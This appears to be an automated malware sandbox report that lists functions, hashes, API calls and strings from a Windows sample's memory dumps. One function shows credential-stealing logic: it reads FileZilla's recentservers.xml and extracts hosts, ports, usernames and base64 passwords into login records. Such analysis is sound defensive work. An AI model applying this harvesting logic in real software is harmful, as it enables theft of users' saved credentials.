Instruction ID: 771c84d8d64fbccdb39bd127beb6e2f9c3e9b17363b4c2bfb482067f6355d503
Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
Instruction Fuzzy Hash: 92022575E006198FCF15CF98C4809ADB7B6FF88310F55816EE809AB354DB31AA92CF90

Function 02469AAF Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
Instruction ID: 97195a29d59007211356cd46f35a43ec17d88be75a029d53a0357af02b290c85
Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
Instruction Fuzzy Hash: 33C14B76E29B924BD313873DD842265F795AFE7194F05D72FFCE472A82EB3092818244

Function 0245A19F Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
Instruction ID: 1be6631e0d0c8c5cb52f6ea81ec355be046f4513786bfb1ebec28153e1886876
Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
Instruction Fuzzy Hash: 71D13470600B64CFD721CF29C484BA7B7E1BB49704F548A2ED89A8BB92DB35E445CF91

Function 024211DF Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
Instruction ID: 342ca1d9c4ed76d866d944217257b32f645bede4c0f341ce7066aa91ec1e651e
Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
Instruction Fuzzy Hash: B5B18172E083115BD308CF25C89076BF7E2EFC8310F5AC93EA89D97291D778D9459A82

Function 02433A0F Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
Instruction ID: 43ca4eabe1eca2f671f0ccc0fe7490f2c1dab48f52151977bb3c270841548985
Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
Instruction Fuzzy Hash: 60B16E72A083119BD308CF25C89176BF7E2EFCC310F5AC93EE89997291D774D9459A82

Function 0242159F Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
Instruction ID: 2308532369629b982a5c645756e7f6550c394ebca86e698ae909857386d6f1e7
Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
Instruction Fuzzy Hash: 07B12771A097118FD706EE3EC481219F7E1AFD6280F50C72EE899B7662EB31E885C740

Function 0246134F Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
Instruction ID: e34d3e7c313080ed0187dc32a874f7c40c9717ca0fc80bd3634c9dcdbf0059af
Opcode Fuzzy Hash: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
Instruction Fuzzy Hash: AA91C075F002158BDF14CE68C988BBBB3A2AF55714F1940ABD95DAB382D371D841CBA3

Function 02478B64 Relevance: .3, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
Instruction ID: 991988afffc8a56c7c6940eb62c8d5f50e7b7ea5cc49e0eae337eebcef83485b
Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
Instruction Fuzzy Hash: 49B14F31611608DFD715CF28C48ABA57BE0FF45368F29865AE9A9CF3A1C335D982DB40

Function 0244A5FF Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
Instruction ID: 5c580ca6971a127833ccd2df00b1a2e08535cd7e44daa83f96bb3b5c4d7ef92e
Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
Instruction Fuzzy Hash: C6C14A75A0471A8FC715DF28C08055AB3F2FF88350F258A6DE8999B721D731E996CF81

Function 0245CA0F Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
Instruction ID: c5d26c82807f189b84cb43eb29169b2d48273009850a207470180cdf4e858454
Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
Instruction Fuzzy Hash: C29159319287A16AEB168B38CC817AABB55FFD6350F00C71BF9D8725A2FB7185858344

Function 0246C805 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
Instruction ID: 2f5f3f7f5589a262ee5bcb69bbe9cd0c05db9711660ffd4d0e539ca449be3457
Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
Instruction Fuzzy Hash: 2DA109B2A10A19CBEB19CF55CCC9AAABBB1FB48314F14C22BD45AE73A0D3349544CF51

Function 024336EF Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
Instruction ID: 8c802ccd69519786fb3fc7c91772ac530f6cea571964190d5dfc5b44e59a98ed
Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
Instruction Fuzzy Hash: 35A17072A087119BD308CF25C89075BF7E2EFC8710F1ACA3EE89997254D774E8419B82

Function 02465C00 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
Instruction ID: e6bd2b2e052bebfcc9fa78dd015b05f53a0df3284bc514c9d8bc4d1120185087
Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
Instruction Fuzzy Hash: BC514C72E09BD589C7058B7944502EEBFB21FE6114F1E82DEC4981F382C375568AC3E6

Function 00860083 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 9854b884e7cd5006902a75673e5c6f178e2d6a456b9c37d4852ceca44a080000
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 97117C72340100AFD754DE59DCC1FA773EAFB99320B2A8065ED08CB316D676E841CB65

Function 023F0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: c910d28e80a456aee6d0d9f21cd52f6b4ecb506da608a48c7aca2698276de3ce
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 33012B736116008FDF65CF28E904BAA33F5FB85206F0540B5EA06D7347E370A841CB80

Function 00419AA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 02436A0F Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54

Function 02409D07 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 0240D503 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 0240D517
free.MSVCRT ref: 0240D51F
free.MSVCRT ref: 0240D527
free.MSVCRT ref: 0240D52F
free.MSVCRT ref: 0240D537
free.MSVCRT ref: 0240D53F
free.MSVCRT ref: 0240D546
free.MSVCRT ref: 0240D54E
free.MSVCRT ref: 0240D556
free.MSVCRT ref: 0240D55E
free.MSVCRT ref: 0240D566
free.MSVCRT ref: 0240D56E
free.MSVCRT ref: 0240D576
free.MSVCRT ref: 0240D57E
free.MSVCRT ref: 0240D586
free.MSVCRT ref: 0240D58E
free.MSVCRT ref: 0240D599
free.MSVCRT ref: 0240D5A1
free.MSVCRT ref: 0240D5A9
free.MSVCRT ref: 0240D5B1
free.MSVCRT ref: 0240D5B9
free.MSVCRT ref: 0240D5C1
free.MSVCRT ref: 0240D5C9
free.MSVCRT ref: 0240D5D1
free.MSVCRT ref: 0240D5D9
free.MSVCRT ref: 0240D5E1
free.MSVCRT ref: 0240D5E9
free.MSVCRT ref: 0240D5F1
free.MSVCRT ref: 0240D5F9
free.MSVCRT ref: 0240D601
free.MSVCRT ref: 0240D609
free.MSVCRT ref: 0240D611
free.MSVCRT ref: 0240D61F
free.MSVCRT ref: 0240D62A
free.MSVCRT ref: 0240D635
free.MSVCRT ref: 0240D640
free.MSVCRT ref: 0240D64B
free.MSVCRT ref: 0240D656
free.MSVCRT ref: 0240D661
free.MSVCRT ref: 0240D66C
free.MSVCRT ref: 0240D677
free.MSVCRT ref: 0240D682
free.MSVCRT ref: 0240D68D
free.MSVCRT ref: 0240D698
free.MSVCRT ref: 0240D6A3
free.MSVCRT ref: 0240D6AE
free.MSVCRT ref: 0240D6B9
free.MSVCRT ref: 0240D6C4
free.MSVCRT ref: 0240D6D2
free.MSVCRT ref: 0240D6DD
free.MSVCRT ref: 0240D6E8
free.MSVCRT ref: 0240D6F3
free.MSVCRT ref: 0240D6FE
free.MSVCRT ref: 0240D709
free.MSVCRT ref: 0240D714
free.MSVCRT ref: 0240D71F
free.MSVCRT ref: 0240D72A
free.MSVCRT ref: 0240D735
free.MSVCRT ref: 0240D740
free.MSVCRT ref: 0240D74B
free.MSVCRT ref: 0240D756
free.MSVCRT ref: 0240D761
free.MSVCRT ref: 0240D76C
free.MSVCRT ref: 0240D777
free.MSVCRT ref: 0240D785
free.MSVCRT ref: 0240D790
free.MSVCRT ref: 0240D79B
free.MSVCRT ref: 0240D7A6
free.MSVCRT ref: 0240D7B1
free.MSVCRT ref: 0240D7BC
free.MSVCRT ref: 0240D7C7
free.MSVCRT ref: 0240D7D2
free.MSVCRT ref: 0240D7DD
free.MSVCRT ref: 0240D7E8
free.MSVCRT ref: 0240D7F3
free.MSVCRT ref: 0240D7FE
free.MSVCRT ref: 0240D809
free.MSVCRT ref: 0240D814
free.MSVCRT ref: 0240D81F
free.MSVCRT ref: 0240D82A
free.MSVCRT ref: 0240D838
free.MSVCRT ref: 0240D843
free.MSVCRT ref: 0240D84E
free.MSVCRT ref: 0240D859
free.MSVCRT ref: 0240D864
free.MSVCRT ref: 0240D86F

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: 14e23b2c787113d4c1885ee09e740ccbe276c27880ba8a4b23f86074dc1b6511
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: B571BD31411A009AD7723B32DD51E4B77A3FF07748F10CA3FA2B621DF09A7268A59E59

Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

strtok_s.MSVCRT ref: 0041047B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
lstrlenA.KERNEL32(00000000), ref: 004104F3

Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
lstrlenA.KERNEL32(00000000), ref: 0041053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
lstrlenA.KERNEL32(00000000), ref: 00410587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
lstrlenA.KERNEL32(00000000), ref: 004105D5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
strtok_s.MSVCRT ref: 004107D9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
memset.MSVCRT ref: 0041083D

Strings

profile: null, xrefs: 004106C8
login: , xrefs: 0041072A
<Port>, xrefs: 00410526
url: , xrefs: 004106D7
<Host>, xrefs: 004104DC
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00410404
browser: FileZilla, xrefs: 004106B9
<User>, xrefs: 00410570
<Pass encoding="base64">, xrefs: 004105BA
password: , xrefs: 0041075B

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: 651455bee2b0a42756e9565741800342137787040433ad72e4a79f1cb305d28c
Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
Opcode Fuzzy Hash: 651455bee2b0a42756e9565741800342137787040433ad72e4a79f1cb305d28c
Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69

Function 023F4877 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00424EC8), ref: 023F4883
lstrlen.KERNEL32(00424F78), ref: 023F488E
lstrlen.KERNEL32(00425040), ref: 023F4899
lstrlen.KERNEL32(004250F8), ref: 023F48A4
lstrlen.KERNEL32(004251A0), ref: 023F48AF
GetProcessHeap.KERNEL32(00000000,?), ref: 023F48BE
RtlAllocateHeap.NTDLL(00000000), ref: 023F48C5
lstrlen.KERNEL32(00425248), ref: 023F48D3
lstrlen.KERNEL32(004252F0), ref: 023F48DE
lstrlen.KERNEL32(00425398), ref: 023F48E9
lstrlen.KERNEL32(00425440), ref: 023F48F4
lstrlen.KERNEL32(004254E8), ref: 023F48FF
lstrlen.KERNEL32(00425590), ref: 023F4913
lstrlen.KERNEL32(00425638), ref: 023F491E
lstrlen.KERNEL32(004256E0), ref: 023F4929
lstrlen.KERNEL32(00425788), ref: 023F4934
lstrlen.KERNEL32(00425830), ref: 023F493F
lstrlen.KERNEL32(004258D8), ref: 023F4968
lstrlen.KERNEL32(00425980), ref: 023F4973
lstrlen.KERNEL32(00425A48), ref: 023F497E
lstrlen.KERNEL32(00425AF0), ref: 023F4989
lstrlen.KERNEL32(00425B98), ref: 023F4994
strlen.MSVCRT ref: 023F49A7
lstrlen.KERNEL32(00425C40), ref: 023F49CF
lstrlen.KERNEL32(00425CE8), ref: 023F49DA
lstrlen.KERNEL32(00425D90), ref: 023F49E5
lstrlen.KERNEL32(00425E38), ref: 023F49F0
lstrlen.KERNEL32(00425EE0), ref: 023F49FB
lstrlen.KERNEL32(00425F88), ref: 023F4A0B
lstrlen.KERNEL32(00426030), ref: 023F4A16
lstrlen.KERNEL32(004260D8), ref: 023F4A21
lstrlen.KERNEL32(00426180), ref: 023F4A2C
lstrlen.KERNEL32(00426228), ref: 023F4A37
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 023F4A53

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2127927946-0
Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
Instruction ID: 923791a64f49423737f1ffa0146671961194a423ba2a6a45058bbb748021226b
Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
Instruction Fuzzy Hash: 74411B79740624ABD7109FE5FC4DADCBF70AB4C712BA08051FA0A89190C7F993859B7D

Function 02409E17 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02409E58
GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02409E71
GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02409E89
GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02409EA1
GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02409EBA
GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02409ED2
GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02409EEA
GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02409F03
GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02409F1B
GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02409F33
GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02409F4C
GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02409F64
GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02409F7C
GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02409F95
GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 02409FAD
GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 02409FC5
GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 02409FDE
GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 02409FF6
GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 0240A00E
GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 0240A027
GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 0240A03F
LoadLibraryA.KERNEL32(006D6F50,?,02406F07), ref: 0240A051
LoadLibraryA.KERNEL32(006D6B7C,?,02406F07), ref: 0240A062
LoadLibraryA.KERNEL32(006D6B04,?,02406F07), ref: 0240A074
LoadLibraryA.KERNEL32(006D6BDC,?,02406F07), ref: 0240A086
LoadLibraryA.KERNEL32(006D6D28,?,02406F07), ref: 0240A097
GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 0240A0B9
GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 0240A0DA
GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 0240A0F2
